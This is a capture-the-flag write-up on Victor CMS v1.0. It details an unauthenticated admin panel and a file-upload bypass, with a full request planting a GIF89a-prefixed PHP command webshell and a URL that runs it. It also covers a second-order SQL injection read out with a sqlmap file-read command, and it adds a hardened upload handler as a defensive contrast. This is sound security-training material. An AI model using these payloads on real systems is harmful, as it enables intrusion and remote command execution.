Introduction
Victor CMS v1.0 has a second-order SQL injection vulnerability and an arbitrary file upload vulnerability.
Arbitrary File Upload
Click Admin: no login is needed, you go straight in, so the admin panel has unauthenticated access.
Once inside, click Users -> Add Users. Only images are allowed to be uploaded, so upload one, intercept the request, and change the extension.
Note: only a command-execution shell works here; uploading an ordinary one-line webshell does not yield the flag.
The captured request is as follows:
POST /admin/users.php?source=add_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------401783054033296637582138189447
Content-Length: 1138
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/users.php?source=add_user
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_name"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_firstname"
1223
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_lastname"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_image"; filename="minglingzhixing.php"
Content-Type: image/jpeg
GIF89a
<?php system($_GET[1]);phpinfo();?>
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_role"
Admin
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_email"
[email protected]
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="user_password"
123
-----------------------------401783054033296637582138189447
Content-Disposition: form-data; name="create_user"
Add User
-----------------------------401783054033296637582138189447--
Forward the request, then fetch the flag directly:
http://xxx/img/minglingzhixing.php?1=cat%20/flag
Got flag{71b2ac87-ae17-41af-8496-fd35a2ee5ad5}
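For contrast, here is a hardened version of the user_image handling, written as an added example for this writeup rather than taken from Victor CMS. It assumes the upload arrives in $_FILES['user_image'], that the GD extension is available, and that $uploadDir is a directory where the web server does not execute PHP.

```php
<?php
// Added example, not Victor CMS code: validate and re-encode an uploaded avatar.
// Returns the server-chosen file name on success, throws on any rejection.
function store_user_image(array $file, string $uploadDir): string
{
    if (!isset($file['tmp_name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    // 1. Allow-list the claimed extension, but never build the path from it.
    //    Changing ".jpg" to ".php" in the multipart filename is rejected here.
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                'png' => 'image/png', 'gif' => 'image/gif'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // 2. Sniff the MIME type from the bytes on disk, not from the
    //    client-supplied "Content-Type: image/jpeg" part header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("content is $mime, expected {$allowed[$ext]}");
    }

    // 3. Re-encode through GD. A bare "GIF89a" prefix followed by PHP is not a
    //    decodable image, and a real image is rewritten from pixel data, which
    //    drops comment/extension blocks where code is usually hidden.
    $img = @imagecreatefromstring(file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('not a decodable image');
    }

    // 4. Random server-chosen name; extension derived from the sniffed type.
    $outExt = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'][$mime];
    $name   = bin2hex(random_bytes(16)) . '.' . $outExt;
    $dest   = rtrim($uploadDir, '/') . '/' . $name;
    $ok = $outExt === 'jpg' ? imagejpeg($img, $dest, 90)
        : ($outExt === 'png' ? imagepng($img, $dest) : imagegif($img, $dest));
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write image');
    }
    return $name;
}
```

Closing the unauthenticated admin access is a separate fix; this only removes the extension-swap and GIF89a-prefix tricks used in the request above, and keeping the upload directory non-executable is what makes the remaining risk acceptable.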
Second-order Injection
Vulnerability principle: a second-order injection arises when a web application, at some stage (usually while storing or processing data), fails to adequately validate, filter or escape user input and then stores that input in a database, file or other storage. In a later request or operation the application uses that unvalidated input again, which can let an attacker carry out malicious actions.
The location is under Categories.
Add an entry directly in the form and intercept the request.
The captured request is as follows:
POST /admin/categories.php HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://XXX
Connection: close
Referer: http://XXX/admin/categories.php
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1721403592,1721489123,1721565653,1721810098; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=e7f021738d24de53ac50fe0eb7d898b50aeb4eb0; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1721810105; HMACCOUNT=EC287CA37499E8D9; PHPSESSID=d7dv0ba39jlho975gt86trann2
Upgrade-Insecure-Requests: 1
Priority: u=0, i
cat_title=13123123&submit=
Feed it straight into sqlmap to dump the database.
No flag was found there, so switch approach and read the file directly:
python sqlmap.py -r ceshi.txt --file-read "/flag" --dbms Mysql